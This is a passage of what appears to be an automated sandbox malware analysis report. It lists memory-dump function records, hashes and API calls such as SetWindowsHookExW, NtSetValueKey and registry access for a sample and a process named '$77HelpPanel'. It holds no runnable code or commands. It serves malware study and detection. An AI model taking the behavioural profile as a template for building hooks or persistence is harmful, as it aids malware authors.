                                                        • 119 functions (nodes 0 to 118) in the dynamically generated region at 0x00007FFAAB400000, from Function_00007FFAAB40000A to Function_00007FFAAB402FF8
                                                        • Call edges are recorded as caller->callee, e.g. Function_00007FFAAB400FFE calls Function_00007FFAAB401308, Function_00007FFAAB4012C8 and Function_00007FFAAB401288

                                                        Control-flow Graph (rendered graph omitted; the function calls NtSetValueKey)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1409723088.00007FFAAB400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffaab400000_YDW0S5K7hi.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID:
                                                        • API String ID: 3702945584-0
                                                        • Opcode ID: d6766c8a20a55807e1c23bf4396d920b5dbce6570ea3d48a1ad7cb905ef3b096
                                                        • Instruction ID: c297e6bf164f15eed0286ac3887b688d2926f3865e428fd0d558b7cdbc0aeb90
                                                        • Opcode Fuzzy Hash: d6766c8a20a55807e1c23bf4396d920b5dbce6570ea3d48a1ad7cb905ef3b096
                                                        • Instruction Fuzzy Hash: 9E31C37190CB4C8FDB58EB58D846AE9BBF0FBA9321F14426FD049D3652C774A8428B81

                                                        Control-flow Graph (rendered graph omitted; the function calls InternetGetConnectedState)
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1409723088.00007FFAAB400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffaab400000_YDW0S5K7hi.jbxd
                                                        Similarity
                                                        • API ID: ConnectedInternetState
                                                        • String ID: YS^p
                                                        • API String ID: 97057780-2374372923
                                                        • Opcode ID: 3833c7b123ab89caf7b557383e8be2846266bdc3cd19763bd3d6be08a29c2a01
                                                        • Instruction ID: 5219f5fcb0451df4fd5b8eb90dea177caa39cc9d1d61113fce2bcd0593dee6d9
                                                        • Opcode Fuzzy Hash: 3833c7b123ab89caf7b557383e8be2846266bdc3cd19763bd3d6be08a29c2a01
                                                        • Instruction Fuzzy Hash: E231E27290DA488FDB58DF9898497F97BE1EF6A310F04416FE00DC3292DA349945CB81

                                                        Control-flow Graph (rendered graph omitted; the function calls RegOpenKeyExW)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1409723088.00007FFAAB400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB400000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffaab400000_YDW0S5K7hi.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: e7c94de835cb4fcab833d6b4f4d302cc4501fce785d3ea796d3cc20c720ea929
                                                        • Instruction ID: 542cd9a1612c946f0370b9aac806a2aa57ffd3a046571c4cb834cdc29644959a
                                                        • Opcode Fuzzy Hash: e7c94de835cb4fcab833d6b4f4d302cc4501fce785d3ea796d3cc20c720ea929
                                                        • Instruction Fuzzy Hash: 1831857191CB488FDB58DF5CD8856E97BE1FB99311F00826FE049D3252DB74A846CB82

                                                        Execution Graph

                                                        Execution Coverage:21.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:17
                                                        Total number of Limit Nodes:0
                                                        (rendered execution graph omitted; its nodes call SetWindowsHookExW and InternetGetConnectedState)

                                                        Control-flow Graph (rendered graph omitted; no Windows API calls in this function)
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0359a62ab52b7c9dcbae293a1a80aed06f933fce6f3878292e52d275ad234f04
                                                        • Instruction ID: b0a627f69d9a041d85af1059241399b2805c633b13c3267e96914b4f4a4ef970
                                                        • Opcode Fuzzy Hash: 0359a62ab52b7c9dcbae293a1a80aed06f933fce6f3878292e52d275ad234f04
                                                        • Instruction Fuzzy Hash: CFF1B470908A4E8FEBA8DF28D855BE937D1FF55350F04826AE84DC72A2CF3498458B81

                                                        Control-flow Graph (rendered graph omitted; no Windows API calls in this function)
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 479fecbf12a6d35e100b34b75a3d34c2e034500375e9401e890e32beff8408e3
                                                        • Instruction ID: 0705ba1b699a3f4757974eadf6ddc9085a96c830750104473cb7c117da1f0b8d
                                                        • Opcode Fuzzy Hash: 479fecbf12a6d35e100b34b75a3d34c2e034500375e9401e890e32beff8408e3
                                                        • Instruction Fuzzy Hash: 44E1D470908A4E8FEBA8DF28D8557E97BD1FF55350F14826EE84DC72A1CE34A8458BC1

                                                        Control-flow Graph (rendered graph omitted; the function calls SetWindowsHookExW)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: fd7f4e06a51b40c8609d7d66f97c028e25556fd1c10cde783d4f81585e644685
                                                        • Instruction ID: 1fec2e55af4dc95cbbe649bd83b656a9d3f331b4dc1981aa044ccf87fd2fd31d
                                                        • Opcode Fuzzy Hash: fd7f4e06a51b40c8609d7d66f97c028e25556fd1c10cde783d4f81585e644685
                                                        • Instruction Fuzzy Hash: 8D91067190DB898FD719DB68D8056F9BBE0EF56321F0482BFD049D35A2CB646806C791

                                                        Control-flow Graph (rendered graph omitted; the function calls SetWindowsHookExW)
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c9ad10c3809a0ea7f01bfbee6c8c4875a4f32b310e65271c04c949157e1ebdc
                                                        • Instruction ID: 8db9f4547bf14a3d9b4fdc25de07d29db9bb894c398b51e01aa3d926c079fe49
                                                        • Opcode Fuzzy Hash: 5c9ad10c3809a0ea7f01bfbee6c8c4875a4f32b310e65271c04c949157e1ebdc
                                                        • Instruction Fuzzy Hash: 95514B72D0C6998FD718EB6CE8069F977D0EF65324F0442BAD04DD71A3DE24684687C1

                                                        Control-flow Graph (rendered graph omitted; the function calls SetWindowsHookExW)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: ccd46d2847d7f9ae5013a31c0e49e9d53906ca2e504f67fe9b5f386d9d43a5ba
                                                        • Instruction ID: 5e01308ab46cd52366302a430a421ff929b92992aa16e3bfaa96e7c39f7a8461
                                                        • Opcode Fuzzy Hash: ccd46d2847d7f9ae5013a31c0e49e9d53906ca2e504f67fe9b5f386d9d43a5ba
                                                        • Instruction Fuzzy Hash: FB31077191CA5D8FDB18EB6CD8066B977E1EB69321F04427ED04DD32A2CE70A81687C1

                                                        Control-flow Graph (rendered graph omitted; the function calls InternetGetConnectedState)
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID: ConnectedInternetState
                                                        • String ID:
                                                        • API String ID: 97057780-0
                                                        • Opcode ID: ef7f2511380ca4e56fb68a46ba1aefadbc65f1be50c7ccaace6145020cc4c1d0
                                                        • Instruction ID: 47aff6be8a6ec9b56eebfd67c00b4e24fcda32fd6e509f686e6c93885eae4277
                                                        • Opcode Fuzzy Hash: ef7f2511380ca4e56fb68a46ba1aefadbc65f1be50c7ccaace6145020cc4c1d0
                                                        • Instruction Fuzzy Hash: 3B31BF7190CA5C8FDB58DF9CD885AE97BE1EFA9321F14416FD009C31A2DB70A845CB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (L5$r6/
                                                        • API String ID: 0-3256336562
                                                        • Opcode ID: 69698f6e42deb178b479bca6e9a455e36a64bd99badd2d79cac3ed4ebb6f6de1
                                                        • Instruction ID: ca617f7e108f7e5d636dd9ee38fd3f56d4f4eb9fb3299933833e71f45451954c
                                                        • Opcode Fuzzy Hash: 69698f6e42deb178b479bca6e9a455e36a64bd99badd2d79cac3ed4ebb6f6de1
                                                        • Instruction Fuzzy Hash: 90711A34A0DA898FDB85EB6CC455BB87BE1EF9E350F0441B9E04DC72A2CD24AC469791
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (L5$r6/
                                                        • API String ID: 0-3256336562
                                                        • Opcode ID: c99ba3d5aac475c4b1d3f9b59f8c6f61dc1adc2b75d2ff56e6fa8a0952a75e3d
                                                        • Instruction ID: 29171559d0865ae28438113b1beb3c1d2b805e3569d69b26bf4beefb89b0959b
                                                        • Opcode Fuzzy Hash: c99ba3d5aac475c4b1d3f9b59f8c6f61dc1adc2b75d2ff56e6fa8a0952a75e3d
                                                        • Instruction Fuzzy Hash: BE51B375A089498FDB88EB6CD455BB8B7E1FF9D350F044179E04EC32A2DE24AC469781
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0D9$cBM_^
                                                        • API String ID: 0-1206066209
                                                        • Opcode ID: 0555061ecbd67700abadb41474db99f89f9b4acd613bbc91a2866bd59fef95a6
                                                        • Instruction ID: 561e9141cc783c8f416a4400f2d7526b2b3e103cafd7193a40726de6a0bd918c
                                                        • Opcode Fuzzy Hash: 0555061ecbd67700abadb41474db99f89f9b4acd613bbc91a2866bd59fef95a6
                                                        • Instruction Fuzzy Hash: 3A512765E09A5A8BF799B778C4457BA3AD0EF55384F4084B9D00DC33E3EE2CA8499391
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8e9
                                                        • API String ID: 0-765408135
                                                        • Opcode ID: 453770480018472aa6e96af97c49e66ab6b6eb9350f8c7095a2221dd9c043ff3
                                                        • Instruction ID: ca2a4ce1762dc7654d18f7eec66d05b97f64c2f343c2c23395ebc5001e9751ed
                                                        • Opcode Fuzzy Hash: 453770480018472aa6e96af97c49e66ab6b6eb9350f8c7095a2221dd9c043ff3
                                                        • Instruction Fuzzy Hash: 1201682590D7918FE746A33898578F27FD0DF82364B0841EBE48CCB0A7D81C598697C1
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6b5f314d34f86bddd241eaf3edb1a430da6f05e42c926ff45eec8bc7b2ca280
                                                        • Instruction ID: 1f94a2ab686ae1e285b86d9e957fb55b685679b034f58d36ce1171dc16d02f18
                                                        • Opcode Fuzzy Hash: f6b5f314d34f86bddd241eaf3edb1a430da6f05e42c926ff45eec8bc7b2ca280
                                                        • Instruction Fuzzy Hash: A1910860A1DA8A4FD796FB7CC469A657FE2EF8920074540F6E44DC73A7DC289C05C741
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8886019d4021642040253ab11760727ea25e8c8dbf71296d43bdc19c4b2ea712
                                                        • Instruction ID: fc258ef7fd8070b1fe380f516f3b9d0f89c63252b80f38c05ba3d2d2adfb4384
                                                        • Opcode Fuzzy Hash: 8886019d4021642040253ab11760727ea25e8c8dbf71296d43bdc19c4b2ea712
                                                        • Instruction Fuzzy Hash: FF410579908A4E8FD785EB6CC4909E97BB2FF89300B4444F5D048D73EFC92868018B61
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8a99d3e5b1b0be373579458842e565c20424c925587017e44be4c690194e0d7
                                                        • Instruction ID: e244095e3b2119e8a85dbbd0f7f598a6ee882abf46c31d6f5becd7f6ee06771f
                                                        • Opcode Fuzzy Hash: a8a99d3e5b1b0be373579458842e565c20424c925587017e44be4c690194e0d7
                                                        • Instruction Fuzzy Hash: 2EE0617250D60C5EEA249659AC06DE63FA8EBC7234F00011EF44CC2012E1116517C351